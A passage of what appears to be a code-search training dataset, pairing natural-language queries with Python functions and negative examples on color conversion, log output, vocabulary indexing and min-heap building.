"def flatten_field(self, f = None):\n\n if f is None:\n if self.data.ndim == 3:\n self.data = np.reshape(self.data, (self.data.shape[0], np.prod(self.data.shape[1:])))\n else:\n raise Exception('Data field is already flattened, multi-level or only temporal (e.g. station)!')\n\n elif f is not None:\n if f.ndim == 3:\n f = np.reshape(f, (f.shape[0], np.prod(f.shape[1:])))\n\n return f\n else:\n raise Exception('The field f is already flattened, multi-level or only temporal (e.g. station)!')",
"def _set_flt_info(self):\n try:\n flfn = self.flts[0]\n self.fl_header = hdr = fits.getheader(flfn, 0)\n except IOError:\n flfn = self.flcs[0]\n self.fl_header = hdr = fits.getheader(flfn, 0)\n\n\n f1, f2 = (hdr['FILTER1'], hdr['FILTER2'])\n if f1.lstrip().lower().startswith('clear'):\n self.filter = f2.strip()\n elif f2.lstrip().lower().startswith('clear'):\n self.filter = f1.strip()\n else:\n self.filter = f1.strip() + '-' + f2.strip()",
"def applyFastToneMapping(\n self, inputImage, outputToneMappedImage=...\n ) -> outputToneMappedImage:\n ..."
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
HSV values in [0..1[. Returns [r, g, b] values from 0 to max inclusive.
|
def hsv_to_rgb(h, s, v, max):
h_i = int(h * 6)
f = h * 6 - h_i
p = v * (1 - s)
q = v * (1 - f * s)
t = v * (1 - (1 - f) * s)
if h_i == 0:
r, g, b = v, t, p
elif h_i == 1:
r, g, b = q, v, p
elif h_i == 2:
r, g, b = p, v, t
elif h_i == 3:
r, g, b = p, q, v
elif h_i == 4:
r, g, b = t, p, v
elif h_i == 5:
r, g, b = v, p, q
return int(r * max + 1), int(g * max + 1), int(b * max + 1)
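
A short usage sketch, assuming hsv_to_rgb above is in scope: stepping the hue by the golden-ratio conjugate is a common way to get visually distinct colors, and each call here maps into the 0..255 range.

GOLDEN_RATIO_CONJUGATE = 0.618033988749895

h = 0.0
palette = []
for _ in range(5):
    h = (h + GOLDEN_RATIO_CONJUGATE) % 1.0        # keep h inside [0..1[
    palette.append(hsv_to_rgb(h, 0.5, 0.95, 255))
print(palette)                                    # five (r, g, b) tuples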
|
[
"def num_to_hsv(value):\n return cv2.cvtColor(np.uint8([[num_to_bgr(value)]]), cv2.COLOR_BGR2HSV)",
"def hsv_to_rgb(h, s, v):\n if s == 0.0:\n return v, v, v\n\n i = int(h * 6.0) # XXX assume int() truncates!\n\n f = (h * 6.0) - i\n p, q, t = v * (1.0 - s), v * (1.0 - s * f), v * (1.0 - s * (1.0 - f))\n i %= 6\n\n if i == 0:\n return v, t, p\n\n if i == 1:\n return q, v, p\n\n if i == 2:\n return p, v, t\n\n if i == 3:\n return p, q, v\n\n if i == 4:\n return t, p, v\n\n if i == 5:\n return v, p, q",
"def getColor(rgb=None, hsv=None):\n # recursion, return a list if input is list of colors:\n if _isSequence(rgb) and (len(rgb) > 3 or _isSequence(rgb[0])):\n seqcol = []\n for sc in rgb:\n seqcol.append(getColor(sc))\n return seqcol\n\n # because they are most common:\n if rgb=='r':\n return (0.9960784313725, 0.11764705882352, 0.121568627450980)\n elif rgb=='g':\n return (0.0156862745098, 0.49803921568627, 0.062745098039215)\n elif rgb=='b':\n return (0.0588235294117, 0.0, 0.984313725490196)\n\n if str(rgb).isdigit():\n rgb = int(rgb)\n\n if hsv:\n c = hsv2rgb(hsv)\n else:\n c = rgb\n\n if _isSequence(c):\n if c[0] <= 1 and c[1] <= 1 and c[2] <= 1:\n return c # already rgb\n else:\n if len(c) == 3:\n return list(np.array(c) / 255.0) # RGB\n else:\n return (c[0] / 255.0, c[1] / 255.0, c[2] / 255.0, c[3]) # RGBA\n\n elif isinstance(c, str): # is string\n c = c.replace(\"grey\", \"gray\").replace(\" \", \"\")\n if 0 < len(c) < 3: # single/double letter color\n if c.lower() in color_nicks.keys():\n c = color_nicks[c.lower()]\n else:\n vedo.logger.warning(f\"Unknown color nickname {c}\\nAvailable abbreviations: {color_nicks}\")\n return (0.5, 0.5, 0.5)\n\n if c.lower() in colors.keys(): # matplotlib name color\n c = colors[c.lower()]\n # from now format is hex!\n\n if c.startswith(\"#\"): # hex to rgb\n h = c.lstrip(\"#\")\n rgb255 = list(int(h[i : i + 2], 16) for i in (0, 2, 4))\n rgbh = np.array(rgb255) / 255.0\n if np.sum(rgbh) > 3:\n vedo.logger.error(f\"in getColor(): Wrong hex color {c}\")\n return (0.5, 0.5, 0.5)\n return tuple(rgbh)\n\n else: # vtk name color\n namedColors = vtk.vtkNamedColors()\n rgba = [0, 0, 0, 0]\n namedColors.GetColor(c, rgba)\n return (rgba[0]/255.0, rgba[1]/255.0, rgba[2]/255.0)\n\n elif isinstance(c, int): # color number\n if c >= 0:\n return colors1[c % 10]\n else:\n return colors2[-c % 10]\n\n elif isinstance(c, float):\n if c >= 0:\n return colors1[int(c) % 10]\n else:\n return colors2[int(-c) % 10]\n\n # print(\"Unknown color:\", c)\n return (0.5, 0.5, 0.5)",
"def hsv2rgb(hsv):\n ma = vtk.vtkMath()\n rgb = [0,0,0]\n ma.HSVToRGB(hsv, rgb)\n return rgb",
"def hsv(n=63):\n\n return colors.hsv_to_rgb(np.column_stack([np.linspace(0, 1, n + 1), np.ones(((n + 1), 2))]))",
"def hsv_color_range(image, points, padding=0):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n color_list = []\n for point in points:\n color = image[point[0], point[1]][:3]\n color_list.append(color)\n color_list = np.asarray(color_list)\n max = np.array([color_list[:, 0].max(), \n color_list[:, 1].max(), \n color_list[:, 2].max()])\n low = np.array([color_list[:, 0].min(), \n color_list[:, 1].min(),\n color_list[:, 2].min(),])\n \n return max, low",
"def hsv2rgb(hsv):\n import matplotlib as mpl\n\n mpl.use(\"Agg\")\n rgb = mpl.colors.hsv_to_rgb(hsv)\n return rgb",
"def get_rgb_from_value(v: float) -> Tuple[int, int, int]:\n # colorsys returns rgb values between 0 and 1\n r, g, b = colorsys.hls_to_rgb(v, 0.5, 1)\n\n # multiply by 255 to get values between 0 and 255\n red = round(r * 255)\n green = round(g * 255)\n blue = round(b * 255)\n return red, green, blue",
"def r2h(img):\n return cv.cvtColor(img,cv.COLOR_RGB2HSV)",
"def hue2clr(hue):\n num = len(hue)\n\n #print 'hue=',hue\n #print 'hue.shape=',hue.shape\n\n rgb = n.zeros([hue.shape[0],3])\n\n #print 'rgb =', rgb\n\n\n for k in range(0,num):\n\n\tif (hue[k] >= 0) & (hue[k] < 0.167):\n\n\t rgb[k,0] = 1\n\t rgb[k,1] = hue[k]/0.167\n\n\telif (hue[k]>= 0.167) & (hue[k] < 0.333):\n\n\t rgb[k,0] = 1-(hue[k]-0.167)/0.167\n\t rgb[k,1] = 1\n\n\telif (hue[k] >= 0.333) & (hue[k] < 0.500):\n\n\t rgb[k,1] = 1\n\t rgb[k,2] = (hue[k]-0.333)/0.167\n\n\telif (hue[k] >= 0.500) & (hue[k] < 0.667):\n\n\t rgb[k,1] = 1-(hue[k]-0.500)/0.167\n\t rgb[k,2] = 1\n\n\telif (hue[k] >= 0.667) & (hue[k] < 0.883):\n\n\t rgb[k,0] = (hue[k]-0.667)/0.167\n\t rgb[k,2] = 1\n\n\telif (hue[k] >= 0.883) & (hue[k] <= 1):\n\n\t rgb[k,0] = 1\n\t rgb[k,2] = 1-(hue[k]-0.883)/0.167\n\n\t#print 'k=',k\n\t#print 'rgb=',rgb\n return rgb",
"def upper_lower_bounds_hsv(value):\n h = num_to_h(value)\n return np.uint8([[[h - 48, 50, 50]]]), np.uint8([[[h + 48, 255, 255]]])",
"def hsv_to_rgb(hsv):\n hsv = np.asarray(hsv)\n\n # check length of the last dimension, should be _some_ sort of rgb\n if hsv.shape[-1] != 3:\n raise ValueError(\"Last dimension of input array must be 3; \"\n \"shape {shp} was found.\".format(shp=hsv.shape))\n\n # if we got pased a 1D array, try to treat as\n # a single color and reshape as needed\n in_ndim = hsv.ndim\n if in_ndim == 1:\n hsv = np.array(hsv, ndmin=2)\n\n # make sure we don't have an int image\n if hsv.dtype.kind in ('iu'):\n hsv = hsv.astype(np.float32)\n\n h = hsv[..., 0]\n s = hsv[..., 1]\n v = hsv[..., 2]\n\n r = np.empty_like(h)\n g = np.empty_like(h)\n b = np.empty_like(h)\n\n i = (h * 6.0).astype(np.int)\n f = (h * 6.0) - i\n p = v * (1.0 - s)\n q = v * (1.0 - s * f)\n t = v * (1.0 - s * (1.0 - f))\n\n idx = i % 6 == 0\n r[idx] = v[idx]\n g[idx] = t[idx]\n b[idx] = p[idx]\n\n idx = i == 1\n r[idx] = q[idx]\n g[idx] = v[idx]\n b[idx] = p[idx]\n\n idx = i == 2\n r[idx] = p[idx]\n g[idx] = v[idx]\n b[idx] = t[idx]\n\n idx = i == 3\n r[idx] = p[idx]\n g[idx] = q[idx]\n b[idx] = v[idx]\n\n idx = i == 4\n r[idx] = t[idx]\n g[idx] = p[idx]\n b[idx] = v[idx]\n\n idx = i == 5\n r[idx] = v[idx]\n g[idx] = p[idx]\n b[idx] = q[idx]\n\n idx = s == 0\n r[idx] = v[idx]\n g[idx] = v[idx]\n b[idx] = v[idx]\n\n rgb = np.empty_like(hsv)\n rgb[..., 0] = r\n rgb[..., 1] = g\n rgb[..., 2] = b\n\n if in_ndim == 1:\n rgb.shape = (3, )\n\n return rgb",
"def color_picker(n, min_h=0, max_h=0.85, s=1.00, v=0.75, alternate=True):\n # for fewer samples, select nearby colors\n steps = max(n, 8)\n\n hues = np.linspace(min_h, max_h, steps).tolist()[0:n]\n if alternate:\n m = ceil(len(hues) / 2)\n h1 = hues[:m]\n h2 = hues[m:]\n hues[::2] = h1\n hues[1::2] = h2\n\n hsv_colors_list = [(h, s, v) for h in hues]\n return hsv_colors_list",
"def equalizev(img):\n h,s,v = cv.split(cv.cvtColor(img,cv.COLOR_RGB2HSV))\n v=equalize(v)\n return cv.cvtColor(cv.merge([h,s,v]),cv.COLOR_HSV2RGB)",
"def to_hsv( color ):\n color=colorsys.rgb_to_hsv(*[x/255.0 for x in color])\n print(\"color in hsv: \",color)\n return (color) #rgb_to_hsv wants floats!",
"def detect_red(hsv_image, min_size, change_to_white):\n\n hsv_boundary = ([165, 100, 100], [10, 255, 255])\n\n centre_array = detect_colour(hsv_image, hsv_boundary, min_size, change_to_white)\n\n return centre_array",
"def rgb2hsv(rgb):\n ma = vtk.vtkMath()\n hsv = [0,0,0]\n ma.RGBToHSV(getColor(rgb), hsv)\n return hsv",
"def gen_color():\n import colorsys\n golden_ratio = 0.618033988749895\n h = 0.22717784590367374\n\n while 1:\n h += golden_ratio\n h %= 1\n HSV_tuple = [h, 0.95, 0.95] # this defines how \"deep\" are the colors\n RGB_tuple = colorsys.hsv_to_rgb(*HSV_tuple)\n yield map(lambda x:str(int(x * 256)), RGB_tuple)",
"def hsvSpace(imagePath):\n img=cv2.imread (imagePath)\n return cv2.cvtColor(img, cv2.COLOR_BGR2HSV)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Flush the given logs time frame, so that all of its entries are printed through the given output.
|
def _flush_frame(logs, output):
for timestamp in sorted(logs):
entries = logs[timestamp]
(level, color, pkrid, process, source, logger, log) = entries[0]
try:
lcolor = LEVEL_COLORS[level]
except KeyError:
lcolor = LEVEL_COLORS['E']
lcolor = 16 + 36 * lcolor[0] + 6 * lcolor[1] + lcolor[2]
color = 16 + 36 * color[0] + 6 * color[1] + color[2]
# print the first line with the timestamp
output.write("\033[38;5;%dm" % lcolor)
output.write("%s|" % level)
output.write(timestamp)
output.write("|\033[38;5;%dm%s:%s|%s|%s|%s\033[39m\n"
% (color, pkrid, process, source, logger, log))
dots = "." * len(timestamp)
# then print all remaining lines (for the considered timestamp)
for (level, color, pkrid, process, source, logger, log) in entries[1:]:
lcolor = LEVEL_COLORS[level]
lcolor = 16 + 36 * lcolor[0] + 6 * lcolor[1] + lcolor[2]
output.write("\033[38;5;%dm" % lcolor)
output.write("%s|%s" % (level, dots))
output.write("|\033[38;5;%sm%s:%s|%s|%s|%s\033[39m\n"
% (color, pkrid, process, source, logger, log))
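
A minimal sketch of the expected inputs, assuming _flush_frame and a LEVEL_COLORS table of this shape are defined in the same module. The (r, g, b) tuples are coordinates in the 6x6x6 xterm-256 color cube (each component 0..5), which is what the 16 + 36*r + 6*g + b arithmetic above expects; the log entries themselves are made up.

import sys

LEVEL_COLORS = {'E': (5, 0, 0), 'W': (5, 5, 0), 'I': (0, 5, 0), 'D': (0, 0, 5)}   # assumed table

logs = {
    "12:00:01.000": [
        ('I', (0, 3, 5), 'pkr42', 'main', 'app.c:10', 'core', 'service started'),
        ('E', (0, 3, 5), 'pkr42', 'main', 'app.c:57', 'core', 'config file missing'),
    ],
}
_flush_frame(logs, sys.stdout)    # prints both entries, timestamp shown only on the first line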
|
[
"def flush(self) -> None:\n for handler in self.logger.handlers:\n handler.flush()",
"def flush():\n\n if stdout != NULL:\n fflush(stdout)",
"def flush(self):\n self._output_flush()",
"def flush():\n actual_flush()",
"def _flush_streams(self):\n sys.stdout.flush()\n sys.stderr.flush()",
"def print_flush(s):\n print s\n sys.stdout.flush()",
"def flush(self):\n if not self.pynba or not self.pynba.enabled:\n return\n\n self.pynba.stop()\n timers = [timer for timer in self.pynba.timers if timer.elapsed]\n document_size = self.pynba.document_size\n memory_peak = self.pynba.memory_peak\n usage = resource.getrusage(resource.RUSAGE_SELF)\n ru_utime = usage.ru_utime - self.resources.ru_utime\n ru_stime = usage.ru_stime - self.resources.ru_stime\n\n self.reporter(\n servername= self.servername,\n hostname= self.pynba.hostname,\n scriptname= self.scriptname,\n elapsed= self.pynba.elapsed,\n timers= timers,\n ru_utime= ru_utime,\n ru_stime= ru_stime,\n document_size= document_size,\n memory_peak= memory_peak\n )\n\n self.pynba.flush()",
"def log_fps(frames, timediff):\n if timediff < 1 or frames == 0 or (frames % 100) != 0:\n return\n # Print message each 1000 frame if FPS > 100\n if frames > 100 * timediff and (frames % 1000) != 0:\n return\n logger.info('Frame {:6d}: FPS {}'.format(frames, int(frames / timediff)))",
"def _flush_metadata(self, force_flush: bool = False) -> None:\n if self._enabled and (time.time() - self.time_last_logged > self.log_interval or force_flush):\n try:\n mcli.update_run_metadata(self.run_name, self.buffered_metadata)\n self.buffered_metadata = {}\n self.time_last_logged = time.time()\n except mcli.MAPIException as e:\n log.error(f'Failed to log metadata to Mosaic with error: {e}')",
"def print_cache() -> None:\n logger.info(CLEAR_TERMINAL)\n for log_level, line in logger.output_cache:\n logger.log(log_level, line)",
"def flush_output_buffer(self):\n\t\tself.ser.flushOutput()",
"def timer_flush_all(self):\n th = threading.Timer(self._thread_delay, self.flush_all)\n th.start()",
"def _shutdown_logger(logger):\n\n for handler in logger.handlers:\n handler.flush()\n handler.close()",
"def log(text):\n if LOG:\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(f\"[{current_time}] {text}\")",
"def flush_stdout_stderr() -> None:\n sys.stdout.flush()\n sys.stderr.flush()",
"def stream_logs(container, stdout=True, stderr=True, tail='all', timeout=10.0):\n deadline = get_time() + timeout\n\n with _haxxed_mrsh(container):\n resp, sock = container.logs(\n stdout=stdout, stderr=stderr, stream=True, tail=tail, follow=True)\n try:\n while True:\n try:\n yield read_frame(resp, sock, deadline)\n except SocketClosed:\n return\n finally:\n # We also need to close the response object to avoid leaking any\n # resources.\n resp.close()",
"def log_every(self, iterable, print_freq=1, row_header=\"\", header=\"\", metrics_format=\"\", delimiter=\"\\t\",\n log_steps=True, log_time=True, file=None):\n section = self.start_section(row_header=row_header, header=header, metrics_format=metrics_format,\n delimiter=delimiter, log_steps=log_steps, log_time=log_time, total=len(iterable))\n section.print_header(file=file)\n step = 0\n for obj in iterable:\n yield obj\n section.step_end()\n step += 1\n if print_freq and (step % print_freq == 0 or step == len(iterable)):\n self.sections[-1].print_row(file=file)\n section.print_footer(file=file)",
"def print_end(self):\n self.time_writer('Time at the end of the Spider: %s'\n % str(datetime.now()))",
"def log_updated(self):\n self.console.update_log(self.temp_stream)\n # we need to repaint, otherwise graceful shutdown messages not visible\n self.__repaint()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Converts a list of examples of pairs of tokens into the corresponding indices according to the given Vocabulary.
|
def examples_to_indices(
examples: list[tuple[str, str]], vocab: Vocabulary
) -> list[tuple[int, int]]:
# zip(*...) "unzips" the list of tuples into a tuple of lists
targets, contexts = zip(*examples)
target_indices = vocab.tokens_to_indices(targets)
context_indices = vocab.tokens_to_indices(contexts)
# zip back together to get the right pairs
return list(zip(target_indices, context_indices))
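
A small usage sketch, assuming examples_to_indices (and the Vocabulary type it is annotated with) is importable; TinyVocab below is a hypothetical stand-in that only provides the one method the function actually calls.

class TinyVocab:
    def __init__(self, tokens):
        self.index = {tok: i for i, tok in enumerate(tokens)}

    def tokens_to_indices(self, tokens):
        return [self.index[tok] for tok in tokens]

vocab = TinyVocab(["the", "cat", "sat", "mat"])
pairs = [("cat", "the"), ("cat", "sat"), ("sat", "mat")]   # (target, context) skip-gram pairs
print(examples_to_indices(pairs, vocab))                   # [(1, 0), (1, 2), (2, 3)]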
|
[
"def tokens_from_index_list(index_list, id2vocab):\n token_list = []\n for i in range(len(index_list)):\n if index_list[i] > len(id2vocab)-1:\n token_list.append(\"<UNK>\")\n else:\n token_list.append(id2vocab[index_list[i]])\n return token_list",
"def sentences2idx(sentences, words):\n seq1 = []\n for i in sentences:\n seq1.append(getSeq(i,words))\n x1,m1 = prepare_data(seq1)\n return x1, m1",
"def words_to_indices(self, words):\n assert isinstance(words, list)\n if all(isinstance(word, list) for word in words):\n return [self.words_to_indices(word) for word in words]\n assert all(isinstance(word, six.string_types) for word in words)\n if self.is_case_sensitive:\n return [self.vocabulary.get(word, self.unknown_index)\n for word in words]\n else:\n return [self.vocabulary.get(word.lower(), self.unknown_index)\n for word in words]",
"def sentences2idx(sentences, words):\r\n seq1 = []\r\n for sent in sentences:\r\n seq1.append(getSeq(sent,words)) # seq is a list of word indices which are in sentences\r\n x1,m1 = prepare_data(seq1)\r\n# print('x shape: {}\\nm shape: {}'.format(x1.shape, m1.shape))\r\n return x1, m1",
"def emailToVocabIndices(email, vocab_list):\n tokenList = emailToTokenList(email)\n indexList = [vocab_list[token] for token in tokenList if token in vocab_list]\n return indexList",
"def words2indices(self, words):\n return [self.word2index(w) for w in words]",
"def imdb2indices(inputs):\n X = [] # results\n word2index = imdb.get_word_index()\n word2index = {k:(v+3) for k,v in word2index.items()}\n word2index[\"<PAD>\"], word2index[\"<START>\"], word2index[\"<UNK>\"], word2index[\"<UNUSED>\"] = 0,1,2,3\n for input_ in inputs:\n X.append([])\n for word in input_:\n idx = word2index.get(word, word2index[\"<UNK>\"])\n X[-1].append(idx)\n return X",
"def tokens_to_indices(self, tokens):\n return([self.__getindex__(t) for t in tokens])",
"def convert_tokens_to_ids(self, tokens):\n return self.vocab.to_indices(tokens)",
"def get_index_mappings(words):\n return {c: i for i, c in enumerate(words)}, {i: c for i, c in enumerate(words)}",
"def word_indices(wordOccuranceVec):\n for idx in wordOccuranceVec.nonzero()[0]:\n for i in range(int(wordOccuranceVec[idx])):\n yield idx",
"def _convert_pairs_to_indices(sentences, word_dict, max_len=None,\n use_null=True):\n sizes = np.array([len(sent) for sent in sentences])\n if use_null:\n sizes += 1\n if max_len is not None:\n max_len += 1\n sizes = sizes * 0 + max_len\n\n if max_len is None:\n max_len = sizes.max()\n\n shape = (len(sentences), max_len)\n array = np.full(shape, word_dict[PADDING], dtype=np.int32)\n\n for i, sent in enumerate(sentences):\n indices = [word_dict[token] for token in sent]\n\n if use_null:\n indices = [word_dict[GO]] + indices\n\n array[i, :len(indices)] = indices\n\n return array, sizes",
"def make_indices(vocabulary): # TODO: write test\n embeddings_dict = bidict({token: i for token, i in zip(vocabulary, count(start=3))})\n embeddings_dict['SOS'] = special_tokens['SOS']\n embeddings_dict['EOS'] = special_tokens['EOS']\n embeddings_dict['UNK'] = special_tokens['UNK']\n return embeddings_dict",
"def text2index(self, text_array, word2int):\n text2index = []\n for sentence in text_array:\n indexes = []\n for word in sentence.split(' '):\n if word in word2int:\n indexes.append(word2int.get(word))\n else:\n indexes.append(\"1\") # <unk>\n text2index.append(indexes)\n return text2index",
"def supply_token_indices(instances, text_field_name: str, pretrained_tokenizer):\n for instance in instances:\n for token in instance.fields[text_field_name]:\n token.text_id = pretrained_tokenizer.tokenizer.convert_tokens_to_ids(token.text)",
"def words_to_indices(self, sentence):\n\t\tindices = []\n\t\tif self.bos:\n\t\t\tindices.append(2)\n\t\tfor word in sentence:\n\t\t\tif word in self.worddict:\n\t\t\t\tindices.append(self.worddict[word])\n\t\t\telse:\n\t\t\t\tindices.append(1)\n\t\tif self.eos:\n\t\t\tindices.append(3)\n\t\treturn indices",
"def decode_indices(indices, vocabulary):\n\n decoded_tokens = [vocabulary[index] for index in indices]\n return \" \".join(decoded_tokens)",
"def inverted_index_template(terms_list: list) -> list:\r\n inverted_index = []\r\n for i in range(len(terms_list)):\r\n inverted_index.append((i + 1, 0, 0, []))\r\n return inverted_index",
"def mapWord2index(self):\n # Add special tokens as first elements in word2index dictionary\n token_count = 0\n for token in [self.pad_token, self.sos_token, self.eos_token, self.unk_token]:\n if token:\n self.word2index[token] = token_count\n token_count += 1\n \n # If vocabulary is trimmed, use trimmed_word_count\n if self.min_word_count or self.max_vocab_size:\n for key in self.trimmed_word_count.keys():\n self.word2index[key] = token_count\n token_count += 1\n \n # If vocabulary is not trimmed, iterate through dataset \n else:\n for line in self.dataset.iloc[:, 0]:\n for word in line.split():\n if word not in self.word2index.keys():\n self.word2index[word] = token_count\n token_count += 1\n # Include strings from target column\n if self.target_col:\n for line in self.dataset.iloc[:, self.target_col]:\n for word in line.split():\n if word not in self.word2index.keys():\n self.word2index[word] = token_count\n token_count += 1\n \n self.word2index.default_factory = lambda: self.word2index[self.unk_token]"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Converts a given array into a min heap
|
def create_min_heap(self, arr):
n = len(arr)
# last n/2 elements will be leaf nodes (CBT property) hence already min heaps
# loop from n/2 to 0 index and convert each index node into min heap
for i in range(int(n / 2), -1, -1):
self.min_heapify(i, arr, n)
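
A quick property check, assuming create_min_heap and its min_heapify helper are methods on a class (called MinHeap here purely for illustration): after the bottom-up build, every parent must be less than or equal to both of its children.

arr = [9, 4, 7, 1, 3, 8, 2]
MinHeap().create_min_heap(arr)    # builds the min heap in place
n = len(arr)
assert all(arr[i] <= arr[c] for i in range(n) for c in (2 * i + 1, 2 * i + 2) if c < n)
print(arr[0])                     # 1, the minimum, now sits at the root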
|
[
"def min_heapify(arr):\n parent = ((len(arr) - 1) - 1) // 2\n while parent >= 0:\n shift_down(arr, parent)\n parent -= 1",
"def heapify(self, array):\n\n heap = MinHeap()\n heap.list = array\n\n if len(heap.list) > 0:\n height = math.floor(math.log2(len(heap.list)))\n leaves_if_full = 2**height\n nodes_if_full = leaves_if_full * 2 - 1\n first_leaf = nodes_if_full - leaves_if_full\n for index in range(first_leaf,len(heap.list)):\n heap.percolate_up(index)\n return heap",
"def heapify(array):\n\n # Check given given parameter data type.\n if not type(array) == list:\n raise TypeError('array must be a list')\n\n n = len(array)\n for i in range(n//2-1, -1, -1):\n repair_heap(array, i, n)\n\n return array",
"def heapsort(arr):\n pass",
"def repair_heap(array, start_index, heap_size):\n\n # Check given given parameter data type.\n if not type(array) == list:\n raise TypeError('array must be a list')\n\n # Assume current node is max\n max_index = start_index\n left_child_index = 2*start_index+1\n right_child_index = 2*start_index+2\n\n # Check if left child node exists and has higher value than parent node\n if left_child_index < heap_size and \\\n array[left_child_index] > array[max_index]:\n max_index = left_child_index\n\n # Check if right child node exists and has even higher value\n # than both parent and left child node\n if right_child_index < heap_size and \\\n array[right_child_index] > array[max_index]:\n max_index = right_child_index\n\n # Swap values if root is not max\n if max_index != start_index:\n array[max_index], array[start_index] \\\n = array[start_index], array[max_index]\n repair_heap(array, max_index, heap_size)\n\n return array",
"def djikstra_heap(s=0):",
"def max_heapify(arr):\n parent = ((len(arr) - 1) - 1 ) // 2\n while parent >= 0:\n shift_down(arr, parent)\n parent -= 1\n return",
"def heap_sort(arr):\n max_heapify(arr)\n for i in range(len(arr) - 1):\n dequeue(arr, len(arr) - 1 - i)\n return arr",
"def build_heap(data):\n # The following naive implementation just sorts the given sequence\n # using selection sort algorithm and saves the resulting sequence\n # of swaps. This turns the given array into a heap, but in the worst\n # case gives a quadratic number of swaps.\n #\n # TODO: replace by a more efficient implementation\n swaps = []\n \n '''\n for i in range(len(data)):\n for j in range(i + 1, len(data)):\n if data[i] > data[j]:\n swaps.append((i, j))\n data[i], data[j] = data[j], data[i]\n '''\n \n '''\n #My implementation below, using SiftUp\n heap=[]\n #ipdb.set_trace()\n for i in range(len(data)):\n swaps.extend(heap_insert_sift_up(heap,data[i]))\n '''\n n=len(data)\n last_parent=math.ceil(n/2)-1\n for i in range(last_parent+1):\n sift_down(data,last_parent-i,swaps)\n \n #ipdb.set_trace()\n return data,swaps",
"def construct_minheap_recursive(arr):\n if len(arr) > 0:\n v = arr.pop()\n heap = BTNode(v)\n else:\n return None\n heap.left = construct_minheap_recursive(arr)\n heap.right = construct_minheap_recursive(arr)\n fix_minheap(heap, heap.value)\n return heap",
"def heapify(list_, max_=False):\n n = len(list_)\n if max_:\n less = operator.gt\n else:\n less = operator.lt\n for i in reversed(range(n//2)):\n _shift_down(list_, i, less)",
"def heapify(self, arg_items):\n # cleaning the present PQ\n self._array.clear()\n \n #fill the array\n for it in arg_items:\n self._array.append(it)\n \n #heapifying the unsorted input\n n = len(self._array)\n \n idx = n-1\n parent_idx = self._parent(idx)\n while ( parent_idx >= 0 ):\n self._sift_down(parent_idx)\n parent_idx -= 1\n \n return",
"def heapSortNonAscending(A, n):\r\n buildHeapMin(A, n)\r\n size = n\r\n for _ in range(n):\r\n A[0], A[size-1] = A[size-1], A[0]\r\n size -= 1\r\n siftDownMin(A, 0, size)",
"def heapRemoveSmallest(self,heap,vertices):\r\n vertices[heap[0][0]]=-1\r\n if len(heap)==1:\r\n heap.pop()\r\n return\r\n vertices[heap[len(heap)-1][0]] =0\r\n heap[0]=heap[len(heap)-1]\r\n heap.pop()\r\n if len(heap)>0:\r\n self.down(heap,0,vertices)",
"def build_random_heap(self, array):\n nodes_list = [Node(i) for i in array]\n # the first element is None - like in regular heap.\n nodes_list.insert(0, None)\n\n for i in range(1, len(nodes_list)):\n if (2 * i) <= (len(nodes_list) - 1):\n nodes_list[i].left_child = nodes_list[2 * i]\n nodes_list[2 * i].parent = nodes_list[i]\n\n if ((2 * i) + 1) <= (len(nodes_list) - 1):\n nodes_list[i].right_child = nodes_list[(2 * i) + 1]\n nodes_list[(2 * i) + 1].parent = nodes_list[i]\n self.root = nodes_list[1]",
"def test_build_minheap_recursive(self):\n ref = [1, 2, 3, 19, 17, 7, 25, 36, 100]\n res = min_heap.MinHeap([100, 36, 25, 19, 17, 7, 3, 2, 1])\n self.assertEqual(ref, res.array)",
"def kmin(array, k):\n array = np.ascontiguousarray(array, dtype='float32')\n m, n = array.shape\n I = np.zeros((m, k), dtype='int64')\n D = np.zeros((m, k), dtype='float32')\n ha = faiss.float_maxheap_array_t()\n ha.ids = swig_ptr(I)\n ha.val = swig_ptr(D)\n ha.nh = m\n ha.k = k\n ha.heapify()\n ha.addn(n, swig_ptr(array))\n ha.reorder()\n return D, I",
"def heapsort(arr):\n #print(arr)\n # Define heap class instance\n heap = Heap()\n\n # Pass parameter LIST received to heap class instance\n for i in arr: \n heap.insert(i) \n\n # it-is max-heap so : TOP ROOT WILL BE ALWAYS GREATER THAN ALL CHILDREN \n # here delete() function gives largest one so the new formed LIST will be reverse\n for i in range(0, heap.get_size()):\n arr[i] = heap.delete() \n \n # print(arr)\n # as because of max-heap structure need to reverse list to have asecending order-list\n arr.reverse() \n \n return arr",
"def heapify(arr, n, i):\n\tlargest = i\n\tleft = 2 * i + 1 # (2i + 1)\n\tright = 2 * i + 2 # (2i + 2)\n\n\t# See if left child of root exists and is\n\t# greater than root\n\tif left < n and arr[largest] < arr[left]:\n\t\tlargest = left\n\n\t# See if right child of root exists and is\n\t# greater than root\n\tif right < n and arr[largest] < arr[right]:\n\t\tlargest = right\n\n\t# Change root, if needed\n\tif largest != i:\n\t\tarr[largest], arr[i] = arr[i], arr[largest]\n\n\t\t# Heapify the root.\n\t\theapify(arr, n, largest)",
"def heap_sort(A):\n hs = HeapSort(A)\n hs.sort()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Assuming its subtrees are already min heaps, converts the tree rooted at the current indx into a min heap.
|
def min_heapify(self, indx, arr, size):
# Get index of left and right child of indx node
left_child = indx * 2 + 1
right_child = indx * 2 + 2
smallest = indx
# check what is the smallest value node in indx, left child and right child
if left_child < size:
if arr[left_child] < arr[smallest]:
smallest = left_child
if right_child < size:
if arr[right_child] < arr[smallest]:
smallest = right_child
# if indx node is not the smallest value, swap with the smallest child
# and recursively call min_heapify on the respective child swapped with
if smallest != indx:
arr[indx], arr[smallest] = arr[smallest], arr[indx]
self.min_heapify(smallest, arr, size)
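
The same sift-down routine also drives extract-min: move the last leaf to the root, shrink the heap by one, and re-heapify from index 0. A sketch, with the MinHeap class name again assumed:

heap = MinHeap()
arr = [9, 4, 7, 1, 3, 8, 2]
heap.create_min_heap(arr)         # arr becomes [1, 3, 2, 4, 9, 8, 7]

size = len(arr)
smallest = arr[0]                 # 1
arr[0] = arr[size - 1]            # move the last leaf to the root
size -= 1                         # logically shrink the heap by one slot
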